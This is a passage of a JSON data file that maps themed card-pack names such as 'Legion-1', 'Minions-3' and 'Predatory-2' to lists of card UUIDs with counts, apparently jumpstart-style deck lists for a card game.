"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "88adbda4-7818-4888-a908-de6073bd0152",
"count": 7
}
],
"Legion-1": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "2f81d2a0-5301-4cae-ac83-ad51647146e3",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "5a129ff7-72f9-4171-902d-a1b49eebfb62",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "e9822b57-8e42-4158-981d-f0b0b0646fc9",
"count": 1
},
{
"id": "59d40386-6ea6-4b77-8c61-2a9a16a88a01",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "ff80029e-650e-469d-8393-0edf7d9cd695",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Legion-2": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "eac9c0ee-97a1-4c31-8a42-30408ef3a49c",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "a3ba79d6-7da0-46ba-a26a-dc484bdae41d",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Legion-3": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "b9d4b138-5edc-4c12-b526-5c258bc1555c",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "a3ba79d6-7da0-46ba-a26a-dc484bdae41d",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Legion-4": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "da1fb1a6-7f64-45a6-9fc0-a325b7600afa",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "46150e35-bcaf-4b53-871d-d1d9091a36ab",
"count": 1
},
{
"id": "5a129ff7-72f9-4171-902d-a1b49eebfb62",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "b9d4b138-5edc-4c12-b526-5c258bc1555c",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Lightning-1": [
{
"id": "5f2a959e-7c17-4226-afcb-bc0bb5a4492b",
"count": 1
},
{
"id": "b52a3f11-6d55-4492-9a2c-c128c09b3d77",
"count": 1
},
{
"id": "017f94bc-f7f0-4eed-9ca0-392872405f32",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 2
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "302ec5d2-ea36-415c-9aa6-808c88a17932",
"count": 1
},
{
"id": "d212e27a-d2e1-430d-86ff-1f7abaad46d4",
"count": 1
},
{
"id": "f65ea432-9ece-40bf-9cdc-95e01a85b78f",
"count": 1
},
{
"id": "ce711943-c1a1-43a0-8b89-8d169cfb8e06",
"count": 1
},
{
"id": "9223ac16-e6fc-4ba6-91d9-7ff27cc17271",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "73c6382b-ceff-4092-9ec3-328cefab440e",
"count": 7
}
],
"Lightning-2": [
{
"id": "d9b53218-804b-4992-9c93-a797dd6b2a04",
"count": 1
},
{
"id": "5f2a959e-7c17-4226-afcb-bc0bb5a4492b",
"count": 1
},
{
"id": "b52a3f11-6d55-4492-9a2c-c128c09b3d77",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 2
},
{
"id": "b1b959af-bb23-42e7-8848-7405ed597c8d",
"count": 1
},
{
"id": "7e84379a-369e-4a9f-8c8b-bf47ab524c4e",
"count": 1
},
{
"id": "302ec5d2-ea36-415c-9aa6-808c88a17932",
"count": 1
},
{
"id": "b7cef88c-0ad6-47c4-b6c8-f989586aa635",
"count": 1
},
{
"id": "f65ea432-9ece-40bf-9cdc-95e01a85b78f",
"count": 1
},
{
"id": "2e14f36e-54b8-4019-bc85-0d9218c52ad2",
"count": 1
},
{
"id": "9223ac16-e6fc-4ba6-91d9-7ff27cc17271",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "73c6382b-ceff-4092-9ec3-328cefab440e",
"count": 7
}
],
"Liliana": [
{
"id": "6c0cc3d9-85f1-49ed-bf8a-81fc6c60bd2a",
"count": 1
},
{
"id": "850ccdcb-2cd7-4f27-aa9b-917a62a5e94d",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "abd4dbd9-982c-43cf-b14c-c3179427d5a1",
"count": 1
},
{
"id": "3dc48b87-62cb-48f6-8979-e6fb98717b52",
"count": 1
},
{
"id": "1945fc78-8aa4-46fb-9571-eaa1c4729e3d",
"count": 1
},
{
"id": "4e35a461-9a8e-4d08-b963-14c8b5237eec",
"count": 1
},
{
"id": "e329a3e2-6702-4758-8aac-c3017e77b619",
"count": 1
},
{
"id": "88531c36-2330-474b-9426-1e4dd0fe4e3e",
"count": 1
},
{
"id": "660ec88f-2063-404a-853e-c985e21d17b0",
"count": 1
},
{
"id": "ee181d58-fed1-4f6d-96a3-4bf057ddd36e",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "fa3b8665-31f2-4142-a076-54bccdaf5a15",
"count": 7
}
],
"Mill": [
{
"id": "ef04340d-284c-4e7b-afd7-444d21a6b382",
"count": 1
},
{
"id": "5b43bdc7-e49e-4848-9101-6cad2ecab4dc",
"count": 1
},
{
"id": "bad3313a-61ef-42c8-a092-390adb51e17e",
"count": 1
},
{
"id": "94975b02-f678-4442-9d1a-cf586aee8789",
"count": 1
},
{
"id": "559bdfd6-8baf-430d-a4c4-5acf81e58b62",
"count": 1
},
{
"id": "a5e3084c-c690-4cc7-9d79-42b1cde073ad",
"count": 1
},
{
"id": "cad50269-6e80-47ea-a027-fa274f904e86",
"count": 1
},
{
"id": "0a932a37-a1db-4df9-9b65-27ee7b46957d",
"count": 1
},
{
"id": "142944d5-1b11-4ec4-b6b4-b5c03e682cd3",
"count": 2
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "c26450d4-125f-423d-b074-3c959460c242",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "ed351e4f-7ee7-4e84-a69d-02b59cebd180",
"count": 7
}
],
"Minions-1": [
{
"id": "80c57801-cc6f-4f1f-b401-7f621fdcfaaa",
"count": 1
},
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "b70d445b-d3d6-4f7c-b9ea-bed6a26d4a2a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "d3ab1d6c-09a6-4f6a-9549-94b439a46680",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "29184c64-03f3-4a50-ac18-e34b6c89635e",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 7
}
],
"Minions-2": [
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "761f2f66-a43b-422e-94b7-3c068314b7ec",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "94a6644a-52e6-454e-a479-44b086240974",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "b70d445b-d3d6-4f7c-b9ea-bed6a26d4a2a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "fc676672-1aeb-420a-b909-5a3215cc2ca6",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 7
}
],
"Minions-3": [
{
"id": "c0bba170-5176-4fab-a10d-e23d70128875",
"count": 1
},
{
"id": "761f2f66-a43b-422e-94b7-3c068314b7ec",
"count": 1
},
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "a49b95d9-2b64-4f33-97b1-db350026aa95",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "05b2cc68-1d20-421f-9800-af0996071554",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 6
}
],
"Minions-4": [
{
"id": "f35fd9cd-795f-4a8b-b2e9-648f6273927e",
"count": 1
},
{
"id": "56a95546-c45a-4da5-b1e8-d5658b5b7d53",
"count": 1
},
{
"id": "63b62aaf-cc36-4235-b802-828b2c4d6341",
"count": 1
},
{
"id": "0bcba8d3-725b-49f9-8281-eafac15208c5",
"count": 1
},
{
"id": "c9cd537c-e40e-438f-a751-e0ad8f6e6283",
"count": 1
},
{
"id": "ae5d7f15-a86f-4eaa-8280-2e7f73c8ce3a",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "d3ab1d6c-09a6-4f6a-9549-94b439a46680",
"count": 1
},
{
"id": "753d3152-da9d-48af-98b0-34efb990205d",
"count": 1
},
{
"id": "9c0f60a6-b5c8-4704-8b61-94e8fc463e5d",
"count": 1
},
{
"id": "29184c64-03f3-4a50-ac18-e34b6c89635e",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "06e0edda-1943-47a3-9ad3-673b38f42c86",
"count": 7
}
],
"Minotaurs-1": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "8b8c80ea-7b29-4335-ba7b-3e51a5a104a9",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b6fef9f8-ff3e-4a3f-a3ff-4534ff0c3946",
"count": 1
},
{
"id": "cbd65150-a698-4f23-836c-5cd0fb153eb3",
"count": 1
},
{
"id": "274cdb39-1454-4c9b-acd8-4f762a48e71f",
"count": 1
},
{
"id": "d2c9ea25-7a5e-4b6d-b071-e929f6b652c4",
"count": 1
},
{
"id": "62584e4f-dac1-4d99-ac0a-6a2451603889",
"count": 1
},
{
"id": "064a6f1c-a058-4cc8-b467-5dbecb5eeb99",
"count": 1
},
{
"id": "be522ae8-9cf4-4c63-9a1c-0010d482c00a",
"count": 1
},
{
"id": "3d36724e-0669-43f9-9d10-f67562b8c6bc",
"count": 1
},
{
"id": "e64d51b3-20a2-4cc3-bd70-7f165940c157",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "99c3decf-4a32-45ff-b7f6-ea2d52387c89",
"count": 7
}
],
"Minotaurs-2": [
{
"id": "c3b633bf-a77e-4b78-b729-a83896abf17c",
"count": 1
},
{
"id": "8b8c80ea-7b29-4335-ba7b-3e51a5a104a9",
"count": 1
},
{
"id": "af648aaf-a8e0-4291-acf9-5f8533728f92",
"count": 1
},
{
"id": "b6fef9f8-ff3e-4a3f-a3ff-4534ff0c3946",
"count": 1
},
{
"id": "cbd65150-a698-4f23-836c-5cd0fb153eb3",
"count": 1
},
{
"id": "568a31c0-799b-48b6-a91c-95d176b22670",
"count": 1
},
{
"id": "274cdb39-1454-4c9b-acd8-4f762a48e71f",
"count": 1
},
{
"id": "62584e4f-dac1-4d99-ac0a-6a2451603889",
"count": 1
},
{
"id": "064a6f1c-a058-4cc8-b467-5dbecb5eeb99",
"count": 1
},
{
"id": "e854e6a3-8684-43fa-9560-ef4c3b62c935",
"count": 1
},
{
"id": "be522ae8-9cf4-4c63-9a1c-0010d482c00a",
"count": 1
},
{
"id": "ab7052f1-9736-47b6-9da3-8c5ca925ab54",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "99c3decf-4a32-45ff-b7f6-ea2d52387c89",
"count": 7
}
],
"Phyrexian": [
{
"id": "e39498cd-9b44-4563-b0fd-9258a52a85b2",
"count": 1
},
{
"id": "a3f2e2e5-5ed2-4040-92ba-ad1ac13f03f6",
"count": 1
},
{
"id": "d0aa3726-038f-4522-a7bd-1877a4fef350",
"count": 1
},
{
"id": "edf4c9e1-eff6-4abc-ad4e-ffd7f1895d8d",
"count": 1
},
{
"id": "2c4497c0-6e0a-4645-b04e-454d8fe97f05",
"count": 1
},
{
"id": "66e19435-59e5-44d4-b26f-f140f8bcaeb0",
"count": 1
},
{
"id": "86eb76e0-11ed-4f89-a2f4-04bc67f3c94d",
"count": 1
},
{
"id": "8b207a4a-47d1-4905-81d3-455c59bfd7da",
"count": 1
},
{
"id": "e34fa15b-4559-4a8f-aa29-5c43eb4eeef9",
"count": 1
},
{
"id": "43296ce8-f055-4778-a187-363a642001e4",
"count": 1
},
{
"id": "fb0271e4-8ad1-4ad9-9b3e-7abf911f3059",
"count": 1
},
{
"id": "89e2bc57-8f18-4ba1-a11b-9d69d029f56a",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "00030770-5e99-4943-819d-8d807c24cc14",
"count": 7
}
],
"Pirates-1": [
{
"id": "a9b016d4-ddf6-47d6-b934-a0b979b60680",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "36056deb-a7f8-4bb3-9c51-890e96f41482",
"count": 1
},
{
"id": "f6db054e-8303-44c7-8c96-d031a8c85b34",
"count": 1
},
{
"id": "b3ea87f1-fbe2-4905-8a97-ceef9d3d0faf",
"count": 1
},
{
"id": "10c1e6ad-1227-4049-89bf-69ace48c3076",
"count": 1
},
{
"id": "3b591fef-21ca-4a3b-990b-d7897a405511",
"count": 1
},
{
"id": "c55c60dc-40ed-4a36-9daa-702f79ffe818",
"count": 1
},
{
"id": "1a6f256b-943e-4cfb-9fc9-d1ded68b5f97",
"count": 1
},
{
"id": "0f2c4e43-71b2-4483-ba54-4be1dcffcd5f",
"count": 1
},
{
"id": "ada68b91-3379-483e-93a0-b6c7c675c1dc",
"count": 1
},
{
"id": "b1ff526b-3822-4073-baab-8ea5f95daf91",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c8c61b0c-408a-4ba5-9a1c-5208b5f7f8d0",
"count": 7
}
],
"Pirates-2": [
{
"id": "a9b016d4-ddf6-47d6-b934-a0b979b60680",
"count": 1
},
{
"id": "48b3c3e3-151f-4f16-bb40-167978180bbc",
"count": 1
},
{
"id": "36056deb-a7f8-4bb3-9c51-890e96f41482",
"count": 1
},
{
"id": "f6db054e-8303-44c7-8c96-d031a8c85b34",
"count": 1
},
{
"id": "b3ea87f1-fbe2-4905-8a97-ceef9d3d0faf",
"count": 1
},
{
"id": "10c1e6ad-1227-4049-89bf-69ace48c3076",
"count": 1
},
{
"id": "3b591fef-21ca-4a3b-990b-d7897a405511",
"count": 1
},
{
"id": "1a6f256b-943e-4cfb-9fc9-d1ded68b5f97",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "04cf3030-dc92-45ab-9c26-f2e6aef67e56",
"count": 1
},
{
"id": "b1ff526b-3822-4073-baab-8ea5f95daf91",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c8c61b0c-408a-4ba5-9a1c-5208b5f7f8d0",
"count": 7
}
],
"Plus One-1": [
{
"id": "b9bd60d3-d2d3-4b69-bd08-04833ff2394e",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "7d5573f8-5fdd-4050-af2a-fbdec51e4f37",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "c8123d01-da65-4d03-9f23-3842fba5fc28",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Plus One-2": [
{
"id": "b9bd60d3-d2d3-4b69-bd08-04833ff2394e",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "7d5573f8-5fdd-4050-af2a-fbdec51e4f37",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "4a6971ad-cbb4-4f66-9bc4-b407c5805e85",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Plus One-3": [
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "b3a35e69-145f-4cb0-b7f1-0eac8638afbe",
"count": 1
},
{
"id": "3f6f2163-5e08-4465-9669-a5a176a2b810",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "eb7a443d-ab85-4c3e-9fd4-f84afcea2665",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Plus One-4": [
{
"id": "d8d851d8-d7d0-4b8a-b520-f3863b78bc66",
"count": 1
},
{
"id": "e1900efd-262a-4eef-a8e8-238801466a88",
"count": 1
},
{
"id": "df520254-0c72-496b-9222-263ca9d3c5d5",
"count": 1
},
{
"id": "3f6f2163-5e08-4465-9669-a5a176a2b810",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "46ff0b33-d153-4b0e-ac48-7e5ed70dea09",
"count": 1
},
{
"id": "71c10923-a5b3-4b50-ae51-59982e05963a",
"count": 1
},
{
"id": "531e1fc0-a3aa-4b57-87b2-79a31af5c922",
"count": 1
},
{
"id": "f10c622c-03ed-492d-baf9-6412cf5e50f4",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "4a6971ad-cbb4-4f66-9bc4-b407c5805e85",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "01838859-51ef-474a-9653-23dd37eed1d6",
"count": 8
}
],
"Predatory-1": [
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "0c1eed0f-9692-44c0-b1ad-afa691165d52",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "6dbe1270-7300-4408-a4c8-92157a8a076f",
"count": 1
},
{
"id": "16482e12-7a8d-4999-8438-da227e6d1305",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "49d8aa8a-3e87-42ac-9c79-2baec771c1ef",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Predatory-2": [
{
"id": "05f13bda-9157-437d-b58b-20d34d03fc49",
"count": 1
},
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "c1195ec5-979b-4c4a-9c04-62bb53c2b011",
"count": 1
},
{
"id": "0c1eed0f-9692-44c0-b1ad-afa691165d52",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "49d8aa8a-3e87-42ac-9c79-2baec771c1ef",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Predatory-3": [
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "c1195ec5-979b-4c4a-9c04-62bb53c2b011",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "6dbe1270-7300-4408-a4c8-92157a8a076f",
"count": 1
},
{
"id": "d0594c41-0361-4a3b-a9cd-60f4e3b0cffe",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "49d8aa8a-3e87-42ac-9c79-2baec771c1ef",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Predatory-4": [
{
"id": "05f13bda-9157-437d-b58b-20d34d03fc49",
"count": 1
},
{
"id": "318a41e3-1c5a-467e-9ffb-e6a5f817f8fe",
"count": 1
},
{
"id": "524fab2b-ff28-4e02-9f25-e038c754b2cf",
"count": 1
},
{
"id": "2f48df6c-8d5d-4d8a-b98a-793f6a56184d",
"count": 1
},
{
"id": "fe39e38e-76e5-4883-b530-d3e30e88ccad",
"count": 1
},
{
"id": "16482e12-7a8d-4999-8438-da227e6d1305",
"count": 1
},
{
"id": "8bba47c1-a874-456e-bea3-e99e2d61cfba",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "91a6f558-a754-4437-8328-00a6ca47f9b5",
"count": 1
},
{
"id": "4037e3b2-cb62-4f88-943d-3edcd6827c23",
"count": 1
},
{
"id": "eb613e46-af18-4195-883b-cdd35b2eaf50",
"count": 1
},
{
"id": "86e89e51-fd37-4f41-ad13-d1b8a93e5277",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b5b4e14a-ab24-4740-b727-165ee9d22e99",
"count": 7
}
],
"Rainbow": [
{
"id": "e8d2180b-f54c-47a9-9458-28e7a19e35ee",
"count": 1
},
{
"id": "b3260793-bf43-4862-9e1f-122edfc35ee4",
